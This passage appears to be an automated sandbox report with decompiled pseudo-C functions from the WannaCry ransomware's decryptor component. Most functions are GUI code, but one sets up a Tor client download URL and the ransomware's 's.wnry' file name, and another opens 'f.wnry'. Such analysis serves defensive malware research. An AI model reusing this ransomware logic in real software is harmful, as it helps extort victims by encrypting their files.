                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #823#825ExecuteMessageSendShell
                                  • String ID: open
                                  • API String ID: 1093558810-2758837156
                                  • Opcode ID: 010bc53f78863e2019c084ea90a161dec355dfc7908859746d80e941f6143737
                                  • Instruction ID: 5f9a2cd0b307edef7ddb37fa3a9b8e73568683458afc550aac563bbb23be8fd8
                                  • Opcode Fuzzy Hash: 010bc53f78863e2019c084ea90a161dec355dfc7908859746d80e941f6143737
                                  • Instruction Fuzzy Hash: 0C0148B0A50301AFE610DF24DD4AF5B77E8AB84B14F00C42AF9499B291E6B4E814CB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004030E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 67%
                                  			E004030E0(intOrPtr __ecx, intOrPtr _a4) {
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _t30;

				_push(0xffffffff);
				_push(E004135B3);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t30;
				_push(__ecx);
				_push(_a4);
				_push(0x8a);
				_v16 = __ecx;
				L00412C92();
				_v12 = 0;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0x60)) = 0x415b28;
				_v12 = 1;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0xa0)) = 0x415a58;
				 *((intOrPtr*)(__ecx + 0xe4)) = 0;
				 *((intOrPtr*)(__ecx + 0xe0)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0xf0)) = 0;
				 *((intOrPtr*)(__ecx + 0xec)) = 0x415a30;
				 *((intOrPtr*)(__ecx)) = 0x415958;
				 *((intOrPtr*)(__ecx + 0xf4)) = 0;
				 *[fs:0x0] = _v20;
				return __ecx;
			}







                                  0x004030e0
                                  0x004030e2
                                  0x004030ed
                                  0x004030ee
                                  0x004030f5
                                  0x004030ff
                                  0x00403100
                                  0x00403105
                                  0x00403109
                                  0x00403115
                                  0x00403119
                                  0x0040311e
                                  0x0040312a
                                  0x00403131
                                  0x0040313a
                                  0x00403140
                                  0x00403146
                                  0x00403150
                                  0x00403156
                                  0x00403160
                                  0x00403166
                                  0x00403171
                                  0x0040317b

                                  APIs
                                  • #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
                                  • #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
                                  • #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #567$#324
                                  • String ID: 0ZA$DZA
                                  • API String ID: 784016053-3838179817
                                  • Opcode ID: 6530db1bbd0e405eb5314e304be7278bbea559453e8c1a2ce06ca27fee27d17e
                                  • Instruction ID: 8222d1989983ac506c5d09346421d66fb4ae1402eeff5ebed15e971907ed65db
                                  • Opcode Fuzzy Hash: 6530db1bbd0e405eb5314e304be7278bbea559453e8c1a2ce06ca27fee27d17e
                                  • Instruction Fuzzy Hash: 430169B1244B42CBD310CF19C580BDAFBE4FB84750F90892EE1AA9B741C3B864458B9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404C40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E00404C40(intOrPtr __ecx, intOrPtr _a4) {
				char _v12;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _t24;

				_push(0xffffffff);
				_push(E00413809);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t24;
				_push(__ecx);
				_push(_a4);
				_push(0x89);
				_v16 = __ecx;
				L00412C92();
				_v12 = 0;
				L00412DA6();
				 *((intOrPtr*)(__ecx + 0x68)) = 0;
				 *((intOrPtr*)(__ecx + 0x64)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x74)) = 0;
				 *((intOrPtr*)(__ecx + 0x70)) = 0x415a30;
				_push(0x421798);
				_v12 = 3;
				 *((intOrPtr*)(__ecx)) = 0x415ec8;
				L00412DA0();
				 *[fs:0x0] = _v24;
				return __ecx;
			}







                                  0x00404c40
                                  0x00404c42
                                  0x00404c4d
                                  0x00404c4e
                                  0x00404c55
                                  0x00404c5e
                                  0x00404c5f
                                  0x00404c64
                                  0x00404c68
                                  0x00404c70
                                  0x00404c7a
                                  0x00404c7f
                                  0x00404c86
                                  0x00404c8d
                                  0x00404c94
                                  0x00404c9b
                                  0x00404ca2
                                  0x00404ca7
                                  0x00404cad
                                  0x00404cba
                                  0x00404cc4

                                  APIs
                                  • #324.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C68
                                  • #540.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C7A
                                  • #860.MFC42(00421798), ref: 00404CAD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #324#540#860
                                  • String ID: 0ZA$DZA
                                  • API String ID: 1048258301-3838179817
                                  • Opcode ID: b0cfd1353d7ceadba60806c011dda0c8f49be3dfc720069eeb22ffbda53a051c
                                  • Instruction ID: 18ed51ee5778a88a9d54698e5e0d11c9dbfb79b85878934ba46accb8ddaa74ae
                                  • Opcode Fuzzy Hash: b0cfd1353d7ceadba60806c011dda0c8f49be3dfc720069eeb22ffbda53a051c
                                  • Instruction Fuzzy Hash: 880169B1644B50DBD311DF09D605BAABBE4FBD1B24F004A1EF1928B790C7BC95488BDA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00408B40 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 78%
                                  			E00408B40(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t23;
				int _t25;
				intOrPtr _t30;
				int _t38;
				int _t41;
				intOrPtr* _t43;
				int _t45;
				intOrPtr _t47;
				struct HDC__* _t50;
				intOrPtr _t52;

				_push(0xffffffff);
				_push(E0041407B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t52;
				_t47 = __ecx;
				_v20 = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x4166e0;
				_t23 =  *((intOrPtr*)(__ecx + 0x30));
				_t50 = 0;
				_v4 = 1;
				if(_t23 == 0) {
					 *((intOrPtr*)(__ecx + 8)) = 0;
					 *(__ecx + 4) = 0;
				} else {
					_t41 =  *(__ecx + 0x24);
					_t45 =  *(__ecx + 0x20);
					_t25 =  *((intOrPtr*)(__ecx + 0x2c)) - _t41;
					_t38 =  *((intOrPtr*)(__ecx + 0x28)) - _t45;
					_t30 =  *((intOrPtr*)(__ecx + 0x1c));
					if(__ecx != 0) {
						_t50 =  *(__ecx + 4);
					}
					BitBlt( *(_t30 + 4), _t45, _t41, _t38, _t25, _t50, _t45, _t41, 0xcc0020);
					_t23 =  *((intOrPtr*)(_t47 + 0x18));
					if(_t23 != 0) {
						_t23 =  *((intOrPtr*)(_t23 + 4));
						_push(_t23);
						_push( *((intOrPtr*)(_t47 + 4)));
						L00412E48();
					} else {
						_push(_t23);
						_push( *((intOrPtr*)(_t47 + 4)));
						L00412E48();
					}
				}
				_t43 = _t47 + 0x10;
				_v16 = _t43;
				 *_t43 = 0x415c00;
				_v4 = 2;
				L00412D52();
				 *_t43 = 0x415bec;
				_v4 = 0xffffffff;
				L00412E3C();
				 *[fs:0x0] = _v12;
				return _t23;
			}

















                                  0x00408b40
                                  0x00408b42
                                  0x00408b4d
                                  0x00408b4e
                                  0x00408b5a
                                  0x00408b5d
                                  0x00408b61
                                  0x00408b67
                                  0x00408b6a
                                  0x00408b6e
                                  0x00408b76
                                  0x00408bd0
                                  0x00408bd3
                                  0x00408b78
                                  0x00408b78
                                  0x00408b7e
                                  0x00408b84
                                  0x00408b8b
                                  0x00408b8d
                                  0x00408b92
                                  0x00408b94
                                  0x00408b94
                                  0x00408ba7
                                  0x00408bad
                                  0x00408bb3
                                  0x00408bc1
                                  0x00408bc7
                                  0x00408bc8
                                  0x00408bc9
                                  0x00408bb5
                                  0x00408bb8
                                  0x00408bb9
                                  0x00408bba
                                  0x00408bba
                                  0x00408bb3
                                  0x00408bd6
                                  0x00408bd9
                                  0x00408bdd
                                  0x00408be5
                                  0x00408bea
                                  0x00408bf1
                                  0x00408bf7
                                  0x00408bff
                                  0x00408c0b
                                  0x00408c15

                                  APIs
                                  • BitBlt.GDI32(?,?,00000001,?,?,00000000,?,00000001,00CC0020), ref: 00408BA7
                                  • #5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BBA
                                  • #5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BC9
                                  • #2414.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BEA
                                  • #640.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BFF
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5785$#2414#640
                                  • String ID:
                                  • API String ID: 2719443296-0
                                  • Opcode ID: 455b206eaea57f198628315411046c596a923de9ec41dd3bd07dbbe9fd6cacce
                                  • Instruction ID: 86c9330ab4234590f1f3c164cda9a19739b95e23c8a4d3600225c259667158ab
                                  • Opcode Fuzzy Hash: 455b206eaea57f198628315411046c596a923de9ec41dd3bd07dbbe9fd6cacce
                                  • Instruction Fuzzy Hash: E1215CB5200B419FC324DF1ACA44A67FBE8EB88710F008A1EF59697781D7B8F8458B65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404530 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E00404530(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct HDC__* _v32;
				void* _v36;
				struct tagSIZE _v48;
				void* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				int _t21;
				void* _t22;
				intOrPtr _t41;

				_push(0xffffffff);
				_push(E004137C8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t41;
				_t21 =  *((intOrPtr*)(__ecx + 0x5a));
				if(_t21 == 0) {
					_t21 =  *((intOrPtr*)(__ecx + 0x58));
					if(_t21 != 0) {
						_push(__ecx);
						L00412DEE();
						_t22 = __ecx + 0x48;
						_push(_t22);
						_v8 = 0;
						L00412DCA();
						_t21 = GetTextExtentPoint32A(_v32,  *(__ecx + 0x40),  *( *(__ecx + 0x40) - 8),  &_v48);
						 *((intOrPtr*)(__ecx + 0x50)) = _v64;
						_push(_t22);
						 *((intOrPtr*)(__ecx + 0x54)) = _v60;
						L00412DCA();
						 *((char*)(__ecx + 0x5a)) = 1;
						_v32 = 0xffffffff;
						L00412DE8();
					}
				}
				 *[fs:0x0] = _v12;
				return _t21;
			}














                                  0x00404536
                                  0x00404538
                                  0x0040453d
                                  0x0040453e
                                  0x0040454b
                                  0x00404550
                                  0x00404552
                                  0x00404557
                                  0x0040455a
                                  0x0040455f
                                  0x00404564
                                  0x0040456b
                                  0x0040456c
                                  0x00404574
                                  0x0040458d
                                  0x0040459b
                                  0x0040459e
                                  0x004045a3
                                  0x004045a6
                                  0x004045af
                                  0x004045b3
                                  0x004045bb
                                  0x004045c0
                                  0x00404557
                                  0x004045c6
                                  0x004045d0

                                  APIs
                                  • #289.MFC42 ref: 0040455F
                                  • #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
                                  • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
                                  • #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
                                  • #613.MFC42 ref: 004045BB
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5789$#289#613ExtentPoint32Text
                                  • String ID:
                                  • API String ID: 888490064-0
                                  • Opcode ID: a47064995aa8a6f4e8062305d7bd768f80382afea7fbb3e7ed5e4407e76e675d
                                  • Instruction ID: e6b376e8f5faa3704f84febb4d8b873e9abde4cd399f019e979504a664a0483f
                                  • Opcode Fuzzy Hash: a47064995aa8a6f4e8062305d7bd768f80382afea7fbb3e7ed5e4407e76e675d
                                  • Instruction Fuzzy Hash: C8119DB5108780AFC310DF18D980B97BBE8EB88714F044A1DF49293681C7B8A845CB22
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406CF0 Relevance: 7.5, APIs: 5, Instructions: 48windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 71%
                                  			E00406CF0(void* __ecx, intOrPtr _a4) {
				int _v12;
				intOrPtr _v20;
				void* _v28;
				char _v36;
				intOrPtr _v40;
				void* _v48;
				struct HWND__* _t16;
				void* _t21;
				void* _t34;
				intOrPtr _t36;

				_push(0xffffffff);
				_push(E00413E78);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t36;
				_t34 = __ecx;
				_t16 = __ecx + 0x4c0;
				if(_t16 != 0) {
					_t16 =  *(_t16 + 0x20);
				}
				SendMessageA(_t16, 0x445, 0, 0x4000000);
				_push(0);
				_push(_a4);
				L00412F44();
				_v12 = 0;
				_v48 =  &_v36;
				_v40 = E00406DA0;
				SendMessageA( *(_t34 + 0x4e0), 0x449, 2,  &_v48);
				L00412F3E();
				_t21 = E00406DC0(_t34);
				_v12 = 0xffffffff;
				L00412F38();
				 *[fs:0x0] = _v20;
				return _t21;
			}













                                  0x00406cf6
                                  0x00406cf8
                                  0x00406cfd
                                  0x00406cfe
                                  0x00406d09
                                  0x00406d0c
                                  0x00406d14
                                  0x00406d16
                                  0x00406d16
                                  0x00406d2c
                                  0x00406d32
                                  0x00406d34
                                  0x00406d39
                                  0x00406d55
                                  0x00406d5d
                                  0x00406d61
                                  0x00406d69
                                  0x00406d6f
                                  0x00406d76
                                  0x00406d7f
                                  0x00406d87
                                  0x00406d92
                                  0x00406d9c

                                  APIs
                                  • SendMessageA.USER32(?,00000445,00000000,04000000), ref: 00406D2C
                                  • #353.MFC42(?,00000000,?,?,?,?,?,?,?,?,?,?,765920C0), ref: 00406D39
                                  • SendMessageA.USER32 ref: 00406D69
                                  • #1979.MFC42 ref: 00406D6F
                                  • #665.MFC42 ref: 00406D87
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#1979#353#665
                                  • String ID:
                                  • API String ID: 3794212480-0
                                  • Opcode ID: 3e8137c70926b1d8ee173e5193f7a8fccbc7f675bb9cd6243914618cf2aa9b36
                                  • Instruction ID: 970bbd2b9484f858b006173e4a833a93101fbe0026f1fdcd253c6fb41473c1ec
                                  • Opcode Fuzzy Hash: 3e8137c70926b1d8ee173e5193f7a8fccbc7f675bb9cd6243914618cf2aa9b36
                                  • Instruction Fuzzy Hash: EA1170B1244701AFD210EF15C942F9BB7E4BF94B14F504A1EF156A72C0C7B8A905CB5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407DB0 Relevance: 7.5, APIs: 5, Instructions: 42COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E00407DB0(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v100;
				char _v196;
				void* _t14;
				intOrPtr _t16;
				intOrPtr _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr _t26;
				void* _t28;

				 *[fs:0x0] = _t26;
				E00401000( &_v196, 0);
				_t24 = __imp__time;
				_v8 = 0;
				_t14 =  *_t24(0, _t23,  *[fs:0x0], E00413FA6, 0xffffffff);
				_t22 =  *0x4218a0; // 0x0
				_t28 = _t26 - 0xb8 + 4;
				if(_t14 - _t22 < 0x12c) {
					_v36 = 0;
				}
				_v32 = 0;
				L00412B72();
				_t16 = _v28;
				if(_t16 >= 0) {
					_t16 =  *_t24(0);
					_t28 = _t28 + 4;
					 *0x4218a0 = _t16;
				}
				 *0x4218a4 =  *0x4218a4 + 1;
				_v4 = 1;
				L00412C9E();
				_v4 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v12;
				return _t16;
			}


















                                  0x00407dbe
                                  0x00407dd2
                                  0x00407dd7
                                  0x00407ddf
                                  0x00407dea
                                  0x00407dec
                                  0x00407df2
                                  0x00407dfc
                                  0x00407dfe
                                  0x00407dfe
                                  0x00407e0d
                                  0x00407e18
                                  0x00407e1d
                                  0x00407e26
                                  0x00407e2a
                                  0x00407e2c
                                  0x00407e2f
                                  0x00407e2f
                                  0x00407e34
                                  0x00407e3e
                                  0x00407e49
                                  0x00407e52
                                  0x00407e5d
                                  0x00407e6a
                                  0x00407e77

                                  APIs
                                    • Part of subcall function 00401000: #324.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401029
                                    • Part of subcall function 00401000: #567.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401039
                                  • time.MSVCRT ref: 00407DEA
                                  • #2514.MFC42 ref: 00407E18
                                  • time.MSVCRT ref: 00407E2A
                                  • #765.MFC42 ref: 00407E49
                                  • #641.MFC42 ref: 00407E5D
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: time$#2514#324#567#641#765
                                  • String ID:
                                  • API String ID: 3372871541-0
                                  • Opcode ID: b8401119eccb86975bd1eb41a25b1802afd83000c8f18fd8393192857fb5272d
                                  • Instruction ID: 27345a9b2c1eb8b6f7bb2a745056f56b64ece2280f016bc8de7da71c9126f67a
                                  • Opcode Fuzzy Hash: b8401119eccb86975bd1eb41a25b1802afd83000c8f18fd8393192857fb5272d
                                  • Instruction Fuzzy Hash: 4C11AD70A097809FE320EF24CA41BDA77E0BB94714F40462EE589872D0EB786445CB97
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004031A0 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E004031A0(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t15;
				intOrPtr* _t24;
				intOrPtr* _t25;
				intOrPtr _t30;

				_push(0xffffffff);
				_push(E004135FF);
				_t15 =  *[fs:0x0];
				_push(_t15);
				 *[fs:0x0] = _t30;
				_v20 = __ecx;
				_v4 = 0;
				_t24 = __ecx + 0xec;
				_v16 = _t24;
				 *_t24 = 0x415c00;
				_v4 = 4;
				L00412D52();
				 *_t24 = 0x415bec;
				_t25 = __ecx + 0xe0;
				_v16 = _t25;
				 *_t25 = 0x415c00;
				_v4 = 5;
				L00412D52();
				 *_t25 = 0x415bec;
				_v4 = 1;
				L00412D4C();
				_v4 = 0;
				L00412D3A();
				_v4 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v12;
				return _t15;
			}











                                  0x004031a0
                                  0x004031a2
                                  0x004031a7
                                  0x004031ad
                                  0x004031ae
                                  0x004031bc
                                  0x004031c0
                                  0x004031c8
                                  0x004031ce
                                  0x004031d2
                                  0x004031da
                                  0x004031df
                                  0x004031e4
                                  0x004031ea
                                  0x004031f0
                                  0x004031f4
                                  0x004031fc
                                  0x00403201
                                  0x0040320c
                                  0x00403212
                                  0x00403217
                                  0x0040321f
                                  0x00403224
                                  0x0040322b
                                  0x00403233
                                  0x0040323e
                                  0x00403248

                                  APIs
                                  • #2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 004031DF
                                  • #2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403201
                                  • #616.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403217
                                  • #693.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403224
                                  • #641.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403233
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414$#616#641#693
                                  • String ID:
                                  • API String ID: 1164084425-0
                                  • Opcode ID: 34bc8b48edd82315a510377cde5f302579feb69e69f968417769f9718486fe20
                                  • Instruction ID: e1576da2e33af18b213473c47bce756763974573e8f92b07b932385a5cbbc76a
                                  • Opcode Fuzzy Hash: 34bc8b48edd82315a510377cde5f302579feb69e69f968417769f9718486fe20
                                  • Instruction Fuzzy Hash: FF112774108B82CAC300DF19C1413CAFBE8AFA5714F54891FE0A6972A2D7F851998BE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040BE90 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 18stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040BE90(char* _a4, char* _a8, char* _a12) {

				strncpy("s.wnry", _a4, 0x63);
				strncpy("https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip", _a8, 0x63);
				strncpy(0x4221ac, _a12, 0x63);
				return 0;
			}



                                  0x0040be9c
                                  0x0040bead
                                  0x0040bebe
                                  0x0040bec8

                                  APIs
                                  Strings
                                  • https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip, xrefs: 0040BEA8
                                  • s.wnry, xrefs: 0040BE97
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strncpy
                                  • String ID: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$s.wnry
                                  • API String ID: 3301158039-3000313716
                                  • Opcode ID: 903ad34784ae10f582f3ba96602ae2cf194015f8b356b40d98df9960d5e2a5fd
                                  • Instruction ID: 9df85d4950b3c0e310111636eb28cd84c7ce5d082e56baf833a5c0d57e8a6ec4
                                  • Opcode Fuzzy Hash: 903ad34784ae10f582f3ba96602ae2cf194015f8b356b40d98df9960d5e2a5fd
                                  • Instruction Fuzzy Hash: 47D017B138C2007AE124BA96EE93E2A22959F88F05F50454AB744550C0E9E99BA0836A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403AF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 132fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 73%
                                  			E00403AF0(void* __edi, void* __ebp) {
				int _v4;
				intOrPtr _v12;
				char _v1252;
				void _v2251;
				char _v2252;
				int _v2256;
				signed int _t43;
				signed char _t44;
				signed int _t52;
				signed int _t58;
				signed int _t75;
				signed int _t78;
				struct _IO_FILE* _t103;
				intOrPtr _t111;
				void* _t113;

				_push(0xffffffff);
				_push(E0041369B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t111;
				_t103 = fopen("f.wnry", "rt");
				_t113 = _t111 - 0x8c4 + 8;
				if(_t103 != 0) {
					E00401E90( &_v1252, __eflags);
					_v4 = 0;
					_t43 = E00402020( &_v1252, 0, E00403810, 0);
					__eflags = _t43;
					if(_t43 != 0) {
						_t44 =  *(_t103 + 0xc);
						_v2256 = 0;
						__eflags = _t44 & 0x00000010;
						if((_t44 & 0x00000010) == 0) {
							while(1) {
								_v2252 = 0;
								memset( &_v2251, 0, 0xf9 << 2);
								asm("stosw");
								asm("stosb");
